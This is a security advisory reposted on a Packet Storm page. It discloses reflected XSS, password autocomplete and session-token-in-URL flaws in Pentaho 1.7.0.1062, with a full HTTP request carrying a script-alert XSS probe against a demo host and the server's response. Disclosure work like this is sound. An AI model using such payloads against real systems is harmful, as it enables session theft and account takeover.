what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Pentaho 1.7.0.1062 XSS / Disclosure

Pentaho 1.7.0.1062 XSS / Disclosure
Posted Oct 15, 2009
Authored by euronymous

Pentaho version 1.7.0.1062 and below suffer from cross site scripting and disclosure vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 49597cb26cd53ef0182ae67b4e95514579433cf0c35d17be9d1532ca908e5593

Pentaho 1.7.0.1062 XSS / Disclosure

Change Mirror Download
Pentaho 1.7.0.1062 Multiple Vulnerabilities

 Name Multiple Vulnerabilities in Pentaho
 Systems Affected Pentaho <= 1.7.0.1062
 Severity High
 Impact (CVSSv2) High 7/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
 Vendor http://www.pentaho.com
 Advisory http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/
 Authors Michele "euronymous" Orrù (euronymous AT antisnatchor DOT com)

 Date 20081224

I. BACKGROUND
Pentaho Analysis puts rich, analytic power in the hands of your business users
helping them gain the insights and understanding they need to make optimal
business decisions.

II. DESCRIPTION

Multiple vulnerabilities exist in Pentaho .

III. ANALYSIS

Summary:

 A) Reflected XSS
 B) Password field with autocomplete enabled
 C) Disclosure of Session Tokens in URL


A) Reflected XSS

The presence of the Cross Site Scripting plague has been veryfied on
/pentaho/ViewAction parameters. The attacker-supplied code can perform
different actions, such as stealing the victim's session token or
login credentials,
performing arbitrary actions on the victim's behalf, and logging their
keystrokes.
Users can be induced to issue the attacker's crafted request in various ways.
For example, an attacker can send to the victim a link containing a
malicious URL in
an email or instant message, instead of submit the link to popular web
applications
that don't escape HTML characters such as <>'\().

An example is the following:

GET /pentaho/ViewAction?&
outputType=khgj345<script>alert('Pwnd')</script>kjh3535
&solution=opentaps&action=CustomerLifeTimeOrders.xaction&path=Customer%20Analysis
HTTP/1.0
User-Agent: Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1
Host: demo1.opentaps.org:8181
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg,
image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: it-IT,it;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: http://demo1.opentaps.org:8181/pentaho/ViewAction?solution=opentaps&path=
Customer%20Analysis&action=CustomerLifeTimeOrders.xaction
Cookie: JSESSIONID=85740C182994F78946BE8A38605396B1
Cookie2: $Version=1
Proxy-Connection: Keep-Alive

When the request will be executed, a popup showing the string Pwnd can be seen.
Here the response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA
date=200707131605)/Tomcat-5.5
content-disposition: inline;filename=Customer_Lifetime_Orders.html
Content-Type: text/html;charset=UTF-8
Content-Length: 1615
Date: Wed, 24 Dec 2008 09:55:32 GMT
Connection: close

<html><head><title>Pentaho BI Platform - Error in Action</title><link
rel="stylesheet"
type="text/css" href="/pentaho-style/active/default.css"></head><body
dir="LTR"><table
cellspacing="10"><tr><td class="portlet-section" colspan="3">Failed<hr
size="1"/></td>
</tr><tr><td class="portlet-font" valign="top"><span style="color:red">
Errore: SecureFilterComponent.ERROR_0001 -
"khgj345<script>alert('Pwnd')</script>kjh3535"
non è una selezione consentita "outputType" per questo utente
(org.pentaho.plugin.core.SecureFilterComponent)</span><p/>Debug:
Partenza dellesecuzione di
{0}/{1}/{2} (org.pentaho.core.solution.SolutionEngine)<br/>Debug:
Lettura del contesto a
runtime e dei dati
(org.pentaho.core.solution.SolutionEngine)<br/>Debug: Caricamento del
file di configurazione dell'Action Sequence
(org.pentaho.core.solution.SolutionEngine)<br/>
Debug: Audit: instanceId=0113b013-d1a1-11dd-a254-65c8cd8ab409,
objectId=org.pentaho.core.runtime.RuntimeContext,
messageType=action_sequence_start
(org.pentaho.core.runtime.RuntimeContext)<br/>Errore:
SecureFilterComponent.ERROR_0001
- "khgj345<script>alert('Pwnd')</script>kjh3535" non è una selezione
consentita "outputType"
per questo utente (org.pentaho.plugin.core.SecureFilterComponent)<br/>Errore:
RuntimeContext.ERROR_0012 - LActionDefinition per {0} non è stata
eseguita con successo
(org.pentaho.core.runtime.RuntimeContext)<br/>Errore:
SolutionEngine.ERROR_0007 -
 Esecuzione dell'Action Sequence fallita
(org.pentaho.core.solution.SolutionEngine)<br/></td>
</tr></table><p>&nbsp;&nbsp;[it_41] Server Version Pentaho BI Platform
1.7.0.1062</body></html>


The same servlet, /pentaho/ViewAction, contains other two parameters
that are vulnerable to reflected
XSS: "action" and "path" (that are exploitable in the same way).


B) Password field with autocomplete enabled

The response to this request:

GET /pentaho/Login;jsessionid=857E0C182994F71355BE8A3860539BH7

contains the login form where credentials are passed to the application.
 [...]
 <tr>
    <td colspan="2"><input type='password' name='j_password' size="30" ></td>
 </tr>
 [...]

The problem is that the autocomplete tag is not set to OFF. We recommend it,
especially for the presence of reflected XSS that in this situation
can be exploited
to retrieve the password input from the browser history.


C) Disclosure of Session Tokens in URL
The web application session identifier, JSESSIONID, is disclosed in the URL:
that's a bad practice because these sensitive informations will be visible
in the client browser history, in the Referer header, in bookmarks.

An example:
http://demo1.opentaps.org:8181/pentaho/Login;jsessionid=857E0C18
2994F71355BE8A38605396B1



IV. DETECTION

1.7.0.1062 and earlier versions are vulnerable.

V. WORKAROUND

Proper input validation and session management will fix the vulnerabilities.

VI. VENDOR RESPONSE

No fix available.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20081224 Initial vendor contact
20081229 Second vendor contact
20090120 Bugs have been assigned to developers
20090619 Bugs have been finally fixed


IX. CREDIT

Michele "euronymous" Orru'

X. LEGAL NOTICES

Copyright (c) 2008 Michele "euronymous" Orru'

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close